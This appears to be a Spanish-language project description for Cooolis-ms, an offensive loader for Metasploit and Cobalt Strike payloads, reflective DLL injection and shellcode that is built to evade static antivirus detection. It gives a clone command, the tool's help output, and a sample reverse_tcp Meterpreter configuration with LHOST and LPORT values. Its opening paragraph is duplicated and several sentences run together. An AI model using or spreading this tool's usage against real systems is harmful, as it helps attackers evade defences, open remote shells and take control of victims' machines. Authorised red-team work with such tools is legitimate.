Cooolis-ms es una herramienta de ejecución de código que incluye Metasploit Payload Loader, Cobalt Strike External C2 Loader y Reflective DLL injection. Su objetivo es evitar, durante el análisis estático, algunos códigos con firmas que se pretenden ejecutar, ayudando a los equipos rojos a migrar de manera más rápida y conveniente desde un entorno de contenedores web a un entorno C2 para continuar su trabajo.

Cooolis-ms es una herramienta de ejecución de código que incluye Metasploit Payload Loader, Cobalt Strike External C2 Loader y Reflective DLL injection. Su objetivo es evadir la detección estática de algunos códigos que vamos a ejecutar y que contienen características, ayudando a los equipos rojos a cambiar de manera más conveniente y rápida del entorno de contenedor web al entorno C2 para continuar trabajando.
git clone https://github.com/Rvn0xsy/Cooolis-msCooolis-ms implementa la funcionalidad de cliente del servicio RPC basándose en la documentación de la API de Metasploit, lo que permite que el servidor de envíe cualquier carga útil, incrementando así su flexibilidad.Cooolis-msCooolis-ms tomó prestado de MemoryModule para implementar la carga de PE, reduciendo las características de ejecución de Cooolis-ms y disminuyendo la probabilidad de detección.Cooolis-ms tomó prestado de ReflectiveDLLInjection para implementar la carga, ejecución e inyección de DLL reflectante, reduciendo las características de ejecución y la probabilidad de detección.Cooolis-ms se basó en External C2 (Command and Control de terceros) para implementar la ejecución básica de External C2, reduciendo las características de ejecución y la probabilidad de detección.Cooolis-ms también considera utilizar archivos en el servidor Aliyun OSS como código de ejecución, cargándolos automáticamente en la memoria para su ejecución, lo que aumenta su flexibilidad.Actualmente Cooolis-ms tiene los siguientes subcomandos:
[~\Documents\Cooolis-ms\Cooolis-ms-Loader\Release]> .\Cooolis-ms.exe -h
Version v1.2.6
Usage: C:\Users\Administrator\Documents\Cooolis-ms\Cooolis-ms-Loader\Release\Cooolis-ms.exe [OPTIONS] SUBCOMMAND
Options:
-h,--help Print this help message and exit
Subcommands:
metasploit Metasploit RPC Loader
cobaltstrike Cobalt Strike External C2 Loader
reflective Reflective DLL injection
shellcode Shellcode Loader
Agregando -h/--help después de un subcomando se obtienen los parámetros detallados del subcomando correspondiente:
[~\Documents\Cooolis-ms\Cooolis-ms-Loader\Release]> .\Cooolis-ms.exe metasploit -h
Metasploit RPC Loader
Usage: C:\Users\Administrator\Documents\Cooolis-ms\Cooolis-ms-Loader\Release\Cooolis-ms.exe metasploit [OPTIONS]
Options:
-h,--help Print this help message and exit
-p,--payload TEXT=windows/meterpreter/reverse_tcp
Payload Name, e.g. windows/meterpreter/reverse_tcp
-o,--options TEXT Payload options, e.g. LHOST=1.1.1.1,LPORT=8866
-P,--PORT UINT:INT in [1 - 65535]=8899 REQUIRED
RPC Server Port
-H,--HOST TEXT:IPV4 REQUIRED
RPC Server Host
Puedes consultar aquí para crear tus propios proyectos:
Si te gusta este proyecto, ¡por favor dale una estrella!